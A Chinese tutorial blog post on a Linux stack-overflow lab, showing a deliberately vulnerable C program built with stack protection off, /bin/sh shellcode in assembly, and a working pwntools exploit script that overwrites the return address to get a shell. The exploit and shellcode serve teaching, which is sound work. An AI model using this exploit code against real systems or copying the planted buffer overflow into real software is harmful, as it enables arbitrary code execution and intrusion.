Linux環境下棧溢出實驗(二) shellcode


簡介 :

棧溢出是由于C語言系列沒有內置檢查機制來確保復制到緩沖區的數據不得大于緩沖區的大小,因此當這個數據足夠大的時候,將會溢出緩沖區的范圍。當溢出緩沖區之后 , 如果繼續寫入數據就有可能將內存中的重要數據覆蓋 , 對程序甚至系統造成嚴重的影響 。駭客也會利用棧溢出來進行權限的提升等等非法操作 , 駭客可以通過編寫 shellcode 并改變程序流程執行自己編寫的 shellcode 從而達到任意代碼執行的目的


環境 :

1. ubuntu 14.10 32位
2. gcc 4.85

視頻演示 :

棧溢出實驗(二) (在線觀看)
棧溢出實驗(二)[代碼] (下載)


代碼 :

hello.c

#include <stdio.h>
#include <unistd.h>

// 可以看到 , 相比于實驗一 , 這次我們的代碼少了 bingo 函數
// 但是我們最后達到的效果還是得到 宿主機 的 shell
// 那么我們應該怎么做呢 , 這里需要用到一種機制 : 棧內存代碼執行漏洞
// 我們先來分析一下代碼
int main(){
    char buffer[0x50] = {0}; // 定義一個 0x50 = 80 個字節的字符數組 , 并全部初始化為 0 
    /*
     * 這次的程序和上次實驗室相比 : 
     *      1. 缺少了 bingo 函數
     *      2. 定義的 buffer 數組長度變大
     *      3. 使用 printf 函數將 buffer 數組的首地址打印出來了
     *  這三個條件就是這次我們能溢出成功的保證
     *  這次我們的思路是這樣的
     *  既然這次程序并沒有給我們給出一個可以執行 /bin/sh 的 bingo 函數
     *  那么我們就需要自己用匯編語言編寫一個調用 /bin/sh 的程序 , 將這個程序匯編以后得到的機器碼(注意必須得是相同平臺 , 否則機器碼不會正常執行)通過 read 函數寫入到內存中
     *  然后由于 read 函數并不檢查 buffer 數組的邊界
     *  因此我們還是可以溢出來覆蓋掉 main 函數的返回地址
     *  因此我們就需要將機器碼先寫入到 buffer 中 , 然后再填充一些無用的字符直到 main 的返回地址處 , 當程序執行到這里的時候 , 為了能讓我們用匯編編譯的機器碼成功執行 , 我們就需要讓匯編機器碼的地址覆蓋 main 的返回地址
     *  這就需要我們獲取 buffer 的首地址 , 計算機器碼的偏移(當然 , 如果匯編機器碼是從 buffer 的第一個字節開始寫入內存的話 , 那么偏移就是 0 , 那么地址就是 buffer 的首地址 , 事實上 , 機器碼要越短小精悍越好 , 因為 buffer 的長度可能并不足以儲存機器碼 , 也就是說 buffer 的地址是非常寶貴的 , 因此最好從 buffer 的首字節開始寫入) , 然后將機器碼的首地址覆蓋到 main 的返回地址 , 然后就可以成功執行 可以運行/bin/sh的機器碼
     *  這樣我們就成功獲取到了目標機器的 shell
     */
    printf("&buffer = %p\n", &buffer); // 打印字符數組在內存(棧段)中的地址
    fflush(stdout); // 刷新緩沖區
    read(0, buffer, 0xFF); // 使用 read 函數將緩沖區中的 0xFF 字節長度的數據讀取到 buffer 數組中 , 以換行符結束
    printf("Content of buffer : %s\n", buffer); // 打印 buffer 的值
    return 0; // 主函數返回
}

Makefile

a.out:hello.c
    gcc -g -fno-stack-protector -z execstack hello.c
clean:
    rm ./a.out

shellcode.asm

push 0BH
pop eax
cdq
push edx
push dword ptr 68732F2FH
push dword ptr 6E69622FH
mov ebx, esp
xor ecx, ecx
int 80H

exploit.py

#!/usr/bin/env python
# encoding:utf-8

from zio import *
import pwn
from binascii import *

shellcode = ""
shellcode += pwn.asm("push 0x0B")
shellcode += pwn.asm("pop eax")
shellcode += pwn.asm("cdq")
shellcode += pwn.asm("push edx")
shellcode += pwn.asm("push dword ptr 0x68732F2F")
shellcode += pwn.asm("push dword ptr 0x6E69622F")
shellcode += pwn.asm("mov ebx, esp")
shellcode += pwn.asm("xor ecx, ecx")
shellcode += pwn.asm("int 0x80")

print b2a_hex(shellcode)
offset = (0xbffff59c - 0xbffff540)
Io = zio("./a.out")
Io.read_until("&buffer = ")
address = int(Io.read_line()[2:-1], 16)
print address
payload = shellcode + "A" * (offset - len(shellcode)) + l32(address)
print b2a_hex(payload)

Io.write(payload)
Io.interact()
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,578評論 6 544
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 99,701評論 3 429
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,691評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,974評論 1 318
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,694評論 6 413
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 56,026評論 1 329
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 44,015評論 3 450
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 43,193評論 0 290
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,719評論 1 336
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,442評論 3 360
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,668評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,151評論 5 365
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,846評論 3 351
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,255評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,592評論 1 295
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,394評論 3 400
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,635評論 2 380

推薦閱讀更多精彩內容

  • 緩沖區溢出(Buffer Overflow)是計算機安全領域內既經典而又古老的話題。隨著計算機系統安全性的加強,傳...
    Chivalrous閱讀 1,342評論 0 5
  • 背景: 閱讀新聞 11G ASM磁盤組不能自動MOUNT處理 [日期:2016-01-12] 來源:Linux社區...
    yanglei3849閱讀 3,879評論 0 2
  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,775評論 25 708
  • 有人說,人這一輩子總要遇到兩個人,一個驚艷了時光,一個溫柔了歲月。 你,在我生命里匆匆而過,卻留下不可磨滅的記憶。...
    黃先森_5304閱讀 435評論 0 0
  • 從前,有一個年輕人不知道生命的意義是什么,他覺得自己活了二十幾年,從來不曾感到真正的快樂。 于是他離開故鄉,千里迢...
    原圓閱讀 602評論 0 2